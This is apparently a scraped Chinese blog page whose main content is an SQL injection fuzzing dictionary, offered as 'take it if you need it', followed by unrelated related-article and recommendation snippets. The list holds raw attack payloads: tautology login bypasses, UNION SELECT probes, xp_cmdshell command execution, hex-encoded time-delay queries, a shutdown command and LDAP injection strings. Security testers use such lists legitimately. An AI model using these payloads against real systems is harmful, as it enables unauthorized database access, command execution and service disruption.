需要的自取

'

"

#

-

--

' --

--';

' ;

= '

= ;

= --

\x23

\x27

\x3D \x3B'

\x3D \x27

\x27\x4F\x52 SELECT *

\x27\x6F\x72 SELECT *

'or select *

admin'--

';shutdown--

<>"'%;)(&+

' or ''='

' or 'x'='x

" or "x"="x

') or ('x'='x

0 or 1=1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 1=1--

" or 1=1--

' or '1'='1'--

"' or 1 --'"

or 1=1--

or%201=1

or%201=1 --

' or 1=1 or ''='

" or 1=1 or ""="

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

'hi' or 'x'='x';

@variable

,@variable

PRINT

PRINT @@variable

select

insert

as

or

procedure

limit

order by

asc

desc

delete

update

distinct

having

truncate

replace

like

handler

bfilename

' or username like '%

' or uname like '%

' or userid like '%

' or uid like '%

' or user like '%

exec xp

exec sp

'; exec master..xp_cmdshell

'; exec xp_regread

t'exec master..xp_cmdshell 'nslookup www.google.com'--

--sp_password

\x27UNION SELECT

' UNION SELECT

' UNION ALL SELECT

' or (EXISTS)

' (select top 1

'||UTL_HTTP.REQUEST

1;SELECT%20*

to_timestamp_tz

tz_offset

&lt;&gt;&quot;'%;)(&amp;+

'%20or%201=1

%27%20or%201=1

%20$(sleep%2050)

%20'sleep%2050'

char%4039%41%2b%40SELECT

&apos;%20OR

'sqlattempt1

(sqlattempt2)

|

%7C

*|

%2A%7C

*(|(mail=*))

%2A%28%7C%28mail%3D%2A%29%29

*(|(objectclass=*))

%2A%28%7C%28objectclass%3D%2A%29%29

(

%28

)

%29

&

%26

!

%21

' or 1=1 or ''='

' or ''='

x' or 1=1 or 'x'='y

/

//

//*

*/*

'

' and '' like '

' AnD '' like '

' or '' like '

' and '' like '%

' aND '' like '%

' and '' like ''--

' and 2>1--

' and 2>3--

') and ('x'='x

) and (1=1

'or''='

'or'='or'

a' or 1=1--

"a"" or 1=1--"

 or a = a

a' or 'a' = 'a

1 or 1=1

a' waitfor delay '0:0:10'--

1 waitfor delay '0:0:10'--

declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)

declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)

declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)

declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)

a'

?

' or 1=1

‘ or 1=1 --

x' AND userid IS NULL; --

x' AND email IS NULL; --

anything' OR 'x'='x

x' AND 1=(SELECT COUNT(*) FROM tabname); --

x' AND members.email IS NULL; --

x' OR full_name LIKE '%Bob%

23 OR 1=1

'; exec master..xp_cmdshell 'ping 172.10.1.255'--

'

'%20or%20''='

'%20or%20'x'='x

%20or%20x=x

')%20or%20('x'='x

0 or 1=1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

 or 0=0 #"

or 0=0 #

' or 1=1--

" or 1=1--

' or '1'='1'--

' or 1 --'

or 1=1--

or%201=1

or%201=1 --

' or 1=1 or ''='

 or 1=1 or ""=

' or a=a--

 or a=a

') or ('a'='a

) or (a=a

hi or a=a

hi or 1=1 --"

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

"hi"") or (""a""=""a"

'hi' or 'x'='x';

@variable

,@variable

PRINT

PRINT @@variable

select

insert

as

or

procedure

limit

order by

asc

desc

delete

update

distinct

having

truncate

replace

like

handler

bfilename

' or username like '%

' or uname like '%

' or userid like '%

' or uid like '%

' or user like '%

exec xp

exec sp

'; exec master..xp_cmdshell

'; exec xp_regread

t'exec master..xp_cmdshell 'nslookup www.google.com'--

--sp_password

\x27UNION SELECT

' UNION SELECT

' UNION ALL SELECT

' or (EXISTS)

' (select top 1

'||UTL_HTTP.REQUEST

1;SELECT%20*

to_timestamp_tz

tz_offset

<>"'%;)(&+

'%20or%201=1

%27%20or%201=1

%20$(sleep%2050)

%20'sleep%2050'

char%4039%41%2b%40SELECT

&apos;%20OR

'sqlattempt1

(sqlattempt2)

|

%7C

*|

%2A%7C

*(|(mail=*))

%2A%28%7C%28mail%3D%2A%29%29

*(|(objectclass=*))

%2A%28%7C%28objectclass%3D%2A%29%29

(

%28

)

%29

&

%26

!

%21

' or 1=1 or ''='

' or ''='

x' or 1=1 or 'x'='y

/

//

//*

*/*

a' or 3=3--

"a"" or 3=3--"

' or 3=3

‘ or 3=3 --

SQL注入Fuzzing字典的更多相关文章

  1. SQL注入fuzz字典

    length Length + handler likeLiKe selectSeleCT sleepSLEEp databaseDATABASe delete having oroR asAs -~ ...

  2. 深入理解SQL注入绕过WAF和过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  3. DAY5 DVWA之SQL注入演练(low)

    1.设置 把安全等级先调整为low,让自己获得点信心,免得一来就被打脸. 2.测试和分析页面的功能       这里有一个输入框 根据上面的提示,输入用户的id.然后我们输入之后,发现它返回了关于这个 ...

  4. 深入了解SQL注入绕过waf和过滤机制

    知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 ...

  5. 见招拆招:绕过WAF继续SQL注入常用方法

    Web Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断绕过.WAF bypass是一个永恒的话题,不少基友也总结了很多奇技怪招.那今天我在这里做个小小的扫盲吧.先来说说 ...

  6. 仿5173游戏交易平台系统SQL注入(可直接脱裤)+Getshell

    最近没事登登好几年前玩过的游戏看看,发现有人喊高价收号,这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是 5173平台交易的网站,叫我直接把号的信息填上去然后填 ...

  7. 深入理解SQL注入绕过WAF与过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  8. 『SQL注入』 User-Agent 手工注入的探测与利用分析

    原理很简单:后台在接收UA时没有对UA做过滤,也没有PDO进行数据交互(实际PDO是非常有必要的),导致UA中有恶意代码,最终在数据库中执行. Bug 代码: 本地顺手打了一个环境,Bug 代码部分: ...

  9. 实验吧_简单的sql注入_1、2、3

    简单的sql注入1 看着这个简单的界面,一时间没有特别好的思路,先输入一个1',发生了报错 初步猜测这是一个字符型的注入,他将我们输入的语句直接当成sql语句执行了,按题目的意思后面肯定过滤了很多注入 ...

  10. DVWA 黑客攻防演练(八)SQL 注入 SQL Injection

    web 程序中离不开数据库,但到今天 SQL注入是一种常见的攻击手段.如今现在一些 orm 框架(Hibernate)或者一些 mapper 框架( iBatis)会对 SQL 有一个更友好的封装,使 ...

随机推荐

  1. Python基础——变量、常量、数字类型、四 列表list、五 字典dict、六 布尔bool、垃圾回收机制、用户交互、运算符、流程控制

    文章目录 变量 一 引入 一.什么是变量? 二.为什么要有变量? 三.怎么使用变量(先定义.后使用) 3.1.变量的定义与使用 3.2.变量名的命名规范 3.3.变量名的命名风格 3.4.变量值的三大 ...

  2. Keycloak 创建和修改自定义用户信息

    前言 公司在用 Keycloak 作为认证服务器,之前在系统数据库里存的,后来想了想是不是可以在 Keycloak 中存.在网上找的方法大多都是通过 admin 接口去改,但这种方法就需要两种解决方案 ...

  3. js数据结构--栈

    <!DOCTYPE html> <html> <head> <title></title> </head> <body&g ...

  4. 【不限框架】超好用的3d开源图片预览插件推荐

    今天给大家推荐一款超好用的图片预览插件-image-preview 简单说明 image-preview是一款主要面向移动端web应用,同时兼容pc,基于原生js,不限框架,react,vue,ang ...

  5. OI 模板合集

    update on 2023.10: 这篇博客的原本意义是 方便直接复制 / 快速复习,但部分原有代码存在本质错误,完全没有起到这个作用,故重构. 由于折叠代码块在某些 markdown 编辑器中不支 ...

  6. 堆优化模拟退火(List-Based Simulated Annealing|List-Based SA|LBSA|模拟退火) 算法

    图炸了的话请多刷新几次(upd:8.9) 堆优化模拟退火(List-Based Simulated Annealing) 算法 引入 堆优化模拟退火(List-Based Simulated Anne ...

  7. http1.x,http2.0,https分别介绍以及他们的区别

    一.HTTP/1.x Http1.x 缺陷:线程阻塞,在同一时间,同一域名的请求有一定数量限制,超过限制数目的请求会被阻塞 http1.0 缺陷:浏览器与服务器只保持短暂的连接,浏览器的每次请求都需要 ...

  8. 从混乱到优雅:基于DDD的六边形架构的代码翻新指南

    前言 趁着双十一备战封板,终于又有一些时间可以梳理一下最近的心得. 最近这半年跟同事讨论比较多的是分层架构,然后就会遇到两个触及灵魂的问题,一个是如何做好分层架构,二是DDD在架构层面该如何落地. 为 ...

  9. JS中有哪几种继承方式

    JS和Java中虽然都有对象的概念,但这两种对象却大有不同.Java的对象是基于类创建的,JS的对象却是基于一个特殊的对象--原型对象--创建的,之前看到一个盖房子的比喻,在Java中盖房子是先画好图 ...

  10. freeRTOS 学习

    一.任务状态 任务状态可以分成 Running 和Not Running: 但实际的Not Running状态还有许多的其他状态作为细分. 包括挂起,阻塞和就绪态 挂起状态表示该任务虽然已经创建但是在 ...